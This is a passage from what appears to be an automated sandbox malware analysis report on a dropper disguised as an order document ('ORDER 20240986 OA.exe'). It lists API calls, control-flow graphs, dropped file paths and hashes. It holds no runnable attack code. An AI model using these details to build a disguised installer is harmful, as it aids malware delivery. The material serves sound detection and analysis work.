                                                                                                                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A88
                                                                                                                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A9B
                                                                                                                                                  • GetFileAttributesW.KERNEL32(Call), ref: 00403AA6
                                                                                                                                                  • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne), ref: 00403AEF
                                                                                                                                                  • RegisterClassW.USER32(007A79C0), ref: 00403B2C
                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B44
                                                                                                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B79
                                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403BAF
                                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BDB
                                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BE8
                                                                                                                                                  • RegisterClassW.USER32(007A79C0), ref: 00403BF1
                                                                                                                                                  • DialogBoxParamW.USER32(?,00000000,00403D35,00000000), ref: 00403C10
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                  • String ID: "C:\Users\user\Desktop\ORDER 20240986 OA.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                  • API String ID: 606308-848720154
                                                                                                                                                  • Opcode ID: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
                                                                                                                                                  • Instruction ID: fbef4646fbcf09e2f3785bbd11e1a9055ea34cd93d2d0ed92f9d0f486109358d
                                                                                                                                                  • Opcode Fuzzy Hash: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
                                                                                                                                                  • Instruction Fuzzy Hash: 4D61B434200700AED320AF669D45F2B3A6CEB86745F40857FF941B51E2DB7D6901CB2D

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 439 402edd-402f2b GetTickCount GetModuleFileNameW call 405d8d 442 402f37-402f65 call 406297 call 405bb8 call 406297 GetFileSize 439->442 443 402f2d-402f32 439->443 451 403052-403060 call 402e79 442->451 452 402f6b 442->452 444 40310f-403113 443->444 458 403062-403065 451->458 459 4030b5-4030ba 451->459 453 402f70-402f87 452->453 456 402f89 453->456 457 402f8b-402f94 call 40330e 453->457 456->457 465 402f9a-402fa1 457->465 466 4030bc-4030c4 call 402e79 457->466 461 403067-40307f call 403324 call 40330e 458->461 462 403089-4030b3 GlobalAlloc call 403324 call 403116 458->462 459->444 461->459 485 403081-403087 461->485 462->459 490 4030c6-4030d7 462->490 469 402fa3-402fb7 call 405d48 465->469 470 40301d-403021 465->470 466->459 476 40302b-403031 469->476 488 402fb9-402fc0 469->488 475 403023-40302a call 402e79 470->475 470->476 475->476 481 403040-40304a 476->481 482 403033-40303d call 406764 476->482 481->453 489 403050 481->489 482->481 485->459 485->462 488->476 494 402fc2-402fc9 488->494 489->451 491 4030d9 490->491 492 4030df-4030e4 490->492 491->492 495 4030e5-4030eb 492->495 494->476 496 402fcb-402fd2 494->496 495->495 497 4030ed-403108 SetFilePointer call 405d48 495->497 496->476 498 402fd4-402fdb 496->498 502 40310d 497->502 498->476 500 402fdd-402ffd 498->500 500->459 501 403003-403007 500->501 503 403009-40300d 501->503 504 40300f-403017 501->504 502->444 503->489 503->504 504->476 505 403019-40301b 504->505 505->476
                                                                                                                                                  APIs
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ORDER 20240986 OA.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                                                                                    • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\ORDER 20240986 OA.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                                                                                                    • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ORDER 20240986 OA.exe,C:\Users\user\Desktop\ORDER 20240986 OA.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                  • String ID: "C:\Users\user\Desktop\ORDER 20240986 OA.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ORDER 20240986 OA.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
                                                                                                                                                  • API String ID: 4283519449-4250594864
                                                                                                                                                  • Opcode ID: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
                                                                                                                                                  • Instruction ID: 6efc7070ea8ae83888cd6b0cd51e2fb70848d81e0c864f736895acd6ba0a04dc
                                                                                                                                                  • Opcode Fuzzy Hash: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
                                                                                                                                                  • Instruction Fuzzy Hash: 6251C271901208ABDB20AF65DD85BAE7FA8EB05355F10807BF904B62D5DB7C8E408B9D

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 783 4062b9-4062c4 784 4062c6-4062d5 783->784 785 4062d7-4062ed 783->785 784->785 786 4062f3-406300 785->786 787 406505-40650b 785->787 786->787 790 406306-40630d 786->790 788 406511-40651c 787->788 789 406312-40631f 787->789 791 406527-406528 788->791 792 40651e-406522 call 406297 788->792 789->788 793 406325-406331 789->793 790->787 792->791 794 4064f2 793->794 795 406337-406375 793->795 799 406500-406503 794->799 800 4064f4-4064fe 794->800 797 406495-406499 795->797 798 40637b-406386 795->798 803 40649b-4064a1 797->803 804 4064cc-4064d0 797->804 801 406388-40638d 798->801 802 40639f 798->802 799->787 800->787 801->802 805 40638f-406392 801->805 808 4063a6-4063ad 802->808 806 4064b1-4064bd call 406297 803->806 807 4064a3-4064af call 4061de 803->807 809 4064d2-4064da call 4062b9 804->809 810 4064df-4064f0 lstrlenW 804->810 805->802 811 406394-406397 805->811 821 4064c2-4064c8 806->821 807->821 813 4063b2-4063b4 808->813 814 4063af-4063b1 808->814 809->810 810->787 811->802 817 406399-40639d 811->817 819 4063b6-4063dd call 406165 813->819 820 4063ef-4063f2 813->820 814->813 817->808 833 4063e3-4063ea call 4062b9 819->833 834 40647d-406480 819->834 822 406402-406405 820->822 823 4063f4-406400 GetSystemDirectoryW 820->823 821->810 825 4064ca 821->825 827 406470-406472 822->827 828 406407-406415 GetWindowsDirectoryW 822->828 826 406474-406478 823->826 830 40648d-406493 call 40652b 825->830 826->830 835 40647a 826->835 827->826 832 406417-406421 827->832 828->827 830->810 838 406423-406426 832->838 839 40643b-406451 SHGetSpecialFolderLocation 832->839 833->826 834->830 836 406482-406488 lstrcatW 834->836 835->834 836->830 838->839 841 406428-40642f 838->841 842 406453-40646a SHGetPathFromIDListW CoTaskMemFree 839->842 843 40646c 839->843 845 406437-406439 841->845 842->826 842->843 843->827 845->826 845->839
                                                                                                                                                  APIs
                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063FA
                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F00,?,00405336,007A0F00,00000000), ref: 0040640D
                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00405336,007924D8,00000000,007A0F00,?,00405336,007A0F00,00000000), ref: 00406449
                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(007924D8,Call), ref: 00406457
                                                                                                                                                  • CoTaskMemFree.OLE32(007924D8), ref: 00406462
                                                                                                                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406488
                                                                                                                                                  • lstrlenW.KERNEL32(Call,00000000,007A0F00,?,00405336,007A0F00,00000000), ref: 004064E0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                  • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                  • API String ID: 717251189-1230650788
                                                                                                                                                  • Opcode ID: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
                                                                                                                                                  • Instruction ID: 404aa91c63c37ecb41bc9170075bd2a6d7acde9a16fb3e5716bfaea1f71b207e
                                                                                                                                                  • Opcode Fuzzy Hash: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
                                                                                                                                                  • Instruction Fuzzy Hash: C0613671A00511ABDF209F24DD40ABE37A5AF45314F12813FE943BA2D0EB3C99A1CB5D

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 846 40176f-401794 call 402c41 call 405be3 851 401796-40179c call 406297 846->851 852 40179e-4017b0 call 406297 call 405b6c lstrcatW 846->852 857 4017b5-4017b6 call 40652b 851->857 852->857 861 4017bb-4017bf 857->861 862 4017c1-4017cb call 4065da 861->862 863 4017f2-4017f5 861->863 871 4017dd-4017ef 862->871 872 4017cd-4017db CompareFileTime 862->872 864 4017f7-4017f8 call 405d68 863->864 865 4017fd-401819 call 405d8d 863->865 864->865 873 40181b-40181e 865->873 874 40188d-4018b6 call 4052ff call 403116 865->874 871->863 872->871 875 401820-40185e call 406297 * 2 call 4062b9 call 406297 call 4058fd 873->875 876 40186f-401879 call 4052ff 873->876 888 4018b8-4018bc 874->888 889 4018be-4018ca SetFileTime 874->889 875->861 908 401864-401865 875->908 886 401882-401888 876->886 891 402ace 886->891 888->889 890 4018d0-4018db CloseHandle 888->890 889->890 893 4018e1-4018e4 890->893 894 402ac5-402ac8 890->894 895 402ad0-402ad4 891->895 897 4018e6-4018f7 call 4062b9 lstrcatW 893->897 898 4018f9-4018fc call 4062b9 893->898 894->891 905 401901-4022fc call 4058fd 897->905 898->905 905->895 908->886 910 401867-401868 908->910 910->876
                                                                                                                                                  APIs
                                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne\Logoi,?,?,00000031), ref: 004017B0
                                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne\Logoi,?,?,00000031), ref: 004017D5
                                                                                                                                                    • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                                                                                                    • Part of subcall function 004052FF: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,74DF23A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                                                                                                    • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,007A0F00,00000000,007924D8,74DF23A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                                                                                                    • Part of subcall function 004052FF: lstrcatW.KERNEL32(007A0F00,00403257,00403257,007A0F00,00000000,007924D8,74DF23A0), ref: 0040535A
                                                                                                                                                    • Part of subcall function 004052FF: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
                                                                                                                                                    • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                                                                                                    • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                                                                                                    • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne\Logoi$C:\Users\user\AppData\Local\Temp\nsx1318.tmp$C:\Users\user\AppData\Local\Temp\nsx1318.tmp\System.dll$Call
                                                                                                                                                  • API String ID: 1941528284-1929218590
                                                                                                                                                  • Opcode ID: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
                                                                                                                                                  • Instruction ID: 2a95d3c8b727dc51f4ea131d05094547f585338353aa12d45a2270be549af1c7
                                                                                                                                                  • Opcode Fuzzy Hash: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
                                                                                                                                                  • Instruction Fuzzy Hash: C141B471910514BACF107BA5DD45DAF3A79EF45328B20823FF512B10E1DB3C4A519B6E

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 912 406601-406621 GetSystemDirectoryW 913 406623 912->913 914 406625-406627 912->914 913->914 915 406638-40663a 914->915 916 406629-406632 914->916 918 40663b-40666e wsprintfW LoadLibraryExW 915->918 916->915 917 406634-406636 916->917 917->918
                                                                                                                                                  APIs
                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                                                                                                  • wsprintfW.USER32 ref: 00406653
                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                  • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                  • API String ID: 2200240437-1946221925
                                                                                                                                                  • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                  • Instruction ID: 65f2176863960af248fb2a7cbd18121a9a3b282edca47cb762b3bdaa43f9a997
                                                                                                                                                  • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                  • Instruction Fuzzy Hash: 14F0217050121967CB10AB68DD0DFDB376CA700304F10447AB547F10D1EBBDDA65CB98

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 919 403116-40312d 920 403136-40313f 919->920 921 40312f 919->921 922 403141 920->922 923 403148-40314d 920->923 921->920 922->923 924 40315d-40316a call 40330e 923->924 925 40314f-403158 call 403324 923->925 929 403170-403174 924->929 930 4032fc 924->930 925->924 931 4032a7-4032a9 929->931 932 40317a-4031a0 GetTickCount 929->932 933 4032fe-4032ff 930->933 934 4032e9-4032ec 931->934 935 4032ab-4032ae 931->935 936 403304 932->936 937 4031a6-4031ae 932->937 938 403307-40330b 933->938 939 4032f1-4032fa call 40330e 934->939 940 4032ee 934->940 935->936 941 4032b0 935->941 936->938 942 4031b0 937->942 943 4031b3-4031c1 call 40330e 937->943 939->930 951 403301 939->951 940->939 945 4032b3-4032b9 941->945 942->943 943->930 953 4031c7-4031d0 943->953 948 4032bb 945->948 949 4032bd-4032cb call 40330e 945->949 948->949 949->930 957 4032cd-4032d9 call 405e3f 949->957 951->936 954 4031d6-4031f6 call 4067d2 953->954 961 4031fc-40320f GetTickCount 954->961 962 40329f-4032a1 954->962 963 4032a3-4032a5 957->963 964 4032db-4032e5 957->964 965 403211-403219 961->965 966 40325a-40325c 961->966 962->933 963->933 964->945 967 4032e7 964->967 968 403221-403257 MulDiv wsprintfW call 4052ff 965->968 969 40321b-40321f 965->969 970 403293-403297 966->970 971 40325e-403262 966->971 967->936 968->966 969->966 969->968 970->937 972 40329d 970->972 974 403264-40326b call 405e3f 971->974 975 403279-403284 971->975 972->936 980 403270-403272 974->980 976 403287-40328b 975->976 976->954 979 403291 976->979 979->936 980->963 981 403274-403277 980->981 981->976
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CountTick$wsprintf
                                                                                                                                                  • String ID: ... %d%%
                                                                                                                                                  • API String ID: 551687249-2449383134
                                                                                                                                                  • Opcode ID: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
